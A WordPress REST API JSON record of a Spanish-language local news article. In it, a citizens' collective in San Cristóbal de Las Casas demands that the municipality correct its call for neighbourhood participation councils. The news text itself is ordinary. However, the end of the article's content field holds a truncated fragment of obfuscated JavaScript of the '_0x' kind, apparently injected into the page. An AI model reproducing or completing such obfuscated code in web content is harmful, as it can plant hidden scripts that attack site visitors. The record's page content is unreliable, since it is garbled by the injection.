{"id":413,"date":"2022-03-10T01:49:12","date_gmt":"2022-03-10T01:49:12","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=413"},"modified":"2022-03-10T01:49:13","modified_gmt":"2022-03-10T01:49:13","slug":"piden-analizar-convocatoria-para-integrar-consejos-vecinales-en-san-cristobal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=413","title":{"rendered":"Piden analizar convocatoria para integrar consejos vecinales en San Crist\u00f3bal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-09-at-1.42.12-PM-2-1024x768.jpeg\" alt=\"\" class=\"wp-image-414\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-09-at-1.42.12-PM-2-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-09-at-1.42.12-PM-2-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-09-at-1.42.12-PM-2-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-09-at-1.42.12-PM-2.jpeg 1040w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>09 de Marzo del 2022. San Crist\u00f3bal de Las.- Esteban Morales, integrante del Colectivo Acci\u00f3n Ciudadana, acompa\u00f1ado de representantes de barrios, colonias y comunidades demandaron a las autoridades municipales, corregir la convocatoria para el proceso de la instalaci\u00f3n de los Consejos de Participaci\u00f3n y Colaboraci\u00f3n Vecinal, ya que aseguran se encuentra incompleta y no est\u00e1 apegada a la Ley Desarrollo Constitucional en Materia de Gobierno y Administraci\u00f3n Municipal.<\/p>\n\n\n\n<p>&#8220;La Direcci\u00f3n de Participaci\u00f3n Ciudadana nos est\u00e1 ignorando, y el regidor Julio C\u00e9sar Berm\u00fadez que es el presidente de dicha comisi\u00f3n, lo que est\u00e1n haciendo es una convocatoria que no se basa en lo que marca la ley, no estamos reclamando por ocurrencia, sino que est\u00e1 en la ley&#8221; dijo en conferencia de prensa.<\/p>\n\n\n\n<p>Inform\u00f3 que han enviado un documento con fecha 11 de febrero y fue recibido por los regidores, d\u00f3nde solicitan reponer la convocatoria, pero no han recibido respuesta, &#8220;nos enteramos de esta convocatoria que emite el Ayuntamiento, d\u00f3nde invita a toda la sociedad a participar con fecha 28 de enero de 2022 y nos inconformamos porque no est\u00e1 bien sustentada, nos basamos en el recurso de revisi\u00f3n seg\u00fan el reglamento interior del Ayuntamiento&#8221;.<\/p>\n\n\n\n<p>En este sentido, Yalina Montes Cruz que forma parte del Colectivo Acci\u00f3n Ciudadana dijo que la ley marca que la representaci\u00f3n de la ciudadan\u00eda tiene diferentes niveles, &#8220;primero se tiene que conformar el Comit\u00e9 de Manzana y a partir de ah\u00ed los jefes de manzana en una reuni\u00f3n nombran a las juntas vecinales de la colonia con un presidente, para que luego entero todos se conforme una asociaci\u00f3n que represente a toda la ciudad&#8221;.<\/p>\n\n\n\n<p>&#8220;En la zona rural tambi\u00e9n se tiene que nombrar una representaci\u00f3n de los comit\u00e9s, o de manzana, y se nombra al comit\u00e9 de pueblo, despu\u00e9s se re\u00fanen con los de ciudad, entonces la convocatoria nada m\u00e1s est\u00e1 mencionando a nivel de manzana, y as\u00ed est\u00e1n nombrando a representantes de colonia y ah\u00ed se queda, ya no pretenden hacer el de ciudad, ni de pueblo, esa es una gran anomal\u00eda que nos preocupa porque se limita la participaci\u00f3n ciudadana&#8221;, concluy\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez 09 de Marzo del 2022. San Crist\u00f3bal de Las.- Esteban Morales, integrante del Colectivo Acci\u00f3n Ciudadana, acompa\u00f1ado de representantes de barrios, colonias y comunidades demandaron a las autoridades municipales, corregir la convocatoria para el proceso de la instalaci\u00f3n de los Consejos de Participaci\u00f3n y Colaboraci\u00f3n Vecinal, ya que aseguran se encuentra incompleta y &hellip;<\/p>\n","protected":false},"author":2,"featured_media":414,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-413","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/413","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=413"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/413\/revisions"}],"predecessor-version":[{"id":415,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/413\/revisions\/415"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/414"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=413"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=413"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=413"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}